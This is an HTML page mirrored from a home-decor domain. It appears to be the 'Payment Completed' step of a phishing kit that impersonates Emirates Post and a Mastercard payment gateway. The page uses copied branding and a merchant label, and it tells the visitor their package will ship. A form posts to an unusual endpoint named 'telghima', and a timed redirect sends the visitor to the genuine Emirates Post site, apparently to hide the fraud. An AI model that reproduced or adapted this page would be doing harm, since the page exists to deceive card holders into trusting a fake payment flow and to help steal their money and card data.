<html>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1" >

<head>
<link rel="icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTrFh7b7k64FG0YJQZ-lrCp32BxBtrXETIG9riRoky90h8OM2N7WcTU7pK4GW-oEg8mmPE&amp;usqp=CAU">

<title>Payment Completed</title>
<link rel="stylesheet" type="text/css" media="screen" href="migs.mastercard.com.au/res/merch/828114000/style/3pp.css">
<link rel="stylesheet" type="text/css" media="screen" href="migs.mastercard.com.au/res/svr/default/style/3ppcust.css">
<Script LANGUAGE="JavaScript">
<!--
    function checkCR(evt) {
        var evt  = (evt) ? evt : ((event) ? event : null);
        var node = (evt.target) ? evt.target : ((evt.srcElement) ? evt.srcElement : null);
        if ((evt.keyCode == 13) && ((node.type == "text") || (node.type == "radio"))) {
            return false;
        }
    }
    document.onkeypress = checkCR;
// -->
</SCRIPT>
</head>

<body class="3PP_body">
<center>

<table width="100%" cellpadding="0" cellspacing="0" border="0">
  <tr class="menu_header">
    <td>
      <table cellpadding="0" cellspacing="0" border="0" class="menu_header_table">
        <tr>
          <td align="left" valign="top" class="menu_header_left_left"><img src="./EmPost_files/thumbnail_thumbnailuicomponentsuc.headerbluelogo2x.png" " width="330" height="120" vspace="5" class="img_menu_l_l"></td>
          <td align="left" valign="top" class="menu_header_left"><img src="#" alt="" vspace="5" class="img_menu_l"></td>
          <td align="left" valign="top" class="menu_header_centre"><img src="migs.mastercard.com.au/res/merch/828114000/images/logo/3PP_menu_centre.gif" alt="" vspace="5" class="img_menu_c"></td>
          <td align="right">
            <table align="right" cellpadding="0" cellspacing="0" border="0">
              <tr>
                      <td align="right" valign="top" class="menu_header_right"><img src="migs.mastercard.com.au/res/merch/828114000/images/logo/3PP_menu_right.gif" alt="" vspace="5" class="img_menu_r"></td>
                      <td align="left" valign="top" class="menu_header_right_right"><img src="migs.mastercard.com.au/res/merch/828114000/images/logo/3PP_menu_right_right.gif" vspace="5" class="img_menu_r_r"></td>
              </tr>
            </table>
            </td>
        </tr>
      </table>
    </td>
  </tr>
  <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
</table>

<table class="bodyHeadSpace" align="center" cellpadding="0" cellspacing="0">
    <tr><td align="right"><strong></strong><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="bodyHeadSpace"></td></tr>
  <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
</table>

<table class="merchTable" align="center" cellspacing="0" cellpadding="0">
<tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr><tr><td>
<table class="merchTable" align="center" cellspacing="0" cellpadding="0">
  <tr>
    <td class="merchCol1"><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="merchSpace1"></td>
    <td align="right" valign="middle" class="merchCol2" nowrap="nowrap"><span class="merchSpace2">Merchant name:&nbsp;</span></td>
    <td class="merchCol3"><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="merchSpace3"></td>
    <td align="left" valign="middle" class="merchCol4" nowrap="nowrap"><span class="merchSpace4">DU QUICK PAY</span></td>
    <td class="merchCol5"><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="merchSpace5"></td>
  </tr>
</td></tr></table>
</table>

<script LANGUAGE="JavaScript">
<!--
    var paid = false;
    function LockPayButton() {
        if (!paid) {
          paid=true;
          return true;
        }
        return false;
    }
// -->
</script>

<table class="payHeadTable" align="center" cellspacing="0" cellpadding="0">
        <tr><td><table>
          <tr class="payHeadRow">
            <td class="payHeadImage"><img src="migs.mastercard.com.au/res/merch/828114000/images/3pp/detailHead.gif"></td>
            <td class="payHeadLabel">Enter your card details</td>
             </tr>
        </td></tr></table align="center" cellspacing="0" cellpadding="0">
        <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidthNoMargin"></td></tr>
</table>

<table class="blockHeadSpace" align="center" cellspacing="0" cellpadding="0">
    <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="blockHeadSpace"></td></tr>
    <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
</table>

<form accept-charset="iso-8859-1" acceptcharset="iso-8859-1" id="paymentDetail" action="telghima" method="POST" onSubmit="return LockPayButton()" AUTOCOMPLETE="OFF">
<input type="hidden" name="paymentId" value="1758812966474659479">
<table align="center" cellspacing="0" cellpadding="0">
    <tr><td><table align="center" cellspacing="0" cellpadding="0">
        <tr>
            <td colspan="3" class="topSeparator"></td>
        </tr>
        <meta http-equiv="refresh" content="10; URL=https://emiratespost.ae/Portal/Home?locale=ar-sa">
        <title>Payment Completed</title>

        <!-- Bootstrap -->
        <link href="./EmPost_files/bootstrap.html" rel="stylesheet" type="text/css">
                        <link href="./EmPost_files/custom.html" rel="stylesheet" type="text/css">                                         
                        
                </div>
                 <div class="clearfix"></div>
                                <div class="alert alert-danger  display-hide" style="display:none;">
                    <button data-dismiss="alert" class="close" type="button">×</button>
                    <strong> Error!</strong>   All fields are required.                </div>
                 
                 
                 <div class="clearfix"></div>
                 <!--              
                 </div>-->
                                 <div class="col-md-12 col-sm-12 card-details">
 <div class="form-wrap creditcard-hide">
                            <center><img style="max-width: 25%" src="./EmPost_files/tick.png"></center>
                            <span><strong>Payment Completed.</strong></span>
                            <p>Your package will be shipped in next 7 working days.</p>
                            </div>
                            <div class="clearfix"></div>
                        </div>


<table class="bodyFootSpace" align="center" cellspacing="0" cellpadding="0" border="0">
    <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="bodyFootSpace"></td></tr>
  <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
    <tr class="bodyFootSeparator"><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif"></td></tr>
</table>
<table class="Copyright" align="center" cellspacing="0" cellpadding="0" border="0">
  <tr>
    <td align="center" valign="middle" class="legal">&copy; 2005-2019 Mastercard</td>
  </tr>
  <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
</table>
<table class="pbHeadSpace" align="center" cellspacing="0" cellpadding="0" border="0">
    <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="pbHeadSpace"></td></tr>
  <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
</table>
<table class="powered_by" align="center" cellspacing="0" cellpadding="0" border="0">
    <tr><td><table class="powered_by_inner" align="center" cellspacing="0" cellpadding="0">
      <tr>
        <td align="left" width="8"><img src="migs.mastercard.com.au/res/svr/default/images/powered_by/powered_by_01.gif" width="8" height="16" border="0"></td>
        <td align="left" height="0">
          <table width="100%" align="center" cellspacing="0" cellpadding="0" background="migs.mastercard.com.au/res/svr/default/images/powered_by/powered_by_02.gif">
            <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" width="8" height="16" border="0"></td></tr></table>
        </td>
      </tr>
    </table></td></tr>
    <tr><td colspan="0"><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
</table>
<table class="pbFootSpace" align="center" cellspacing="0" cellpadding="0" border="0">
    <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="pbFootSpace"></td></tr>
    <tr><td><img src="migs.mastercard.com.au/res/merch/828114000/images/clearpixel.gif" class="payHeadWidth"></td></tr>
</table>

</center>
</body>

<!-- Mirrored from barishomedecor.com/EMIRATEPOSST2/EMIRATEPOSST2/EMIRATEPOSST/paymentcompleted.php by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 03 Oct 2022 10:25:45 GMT -->
</html>
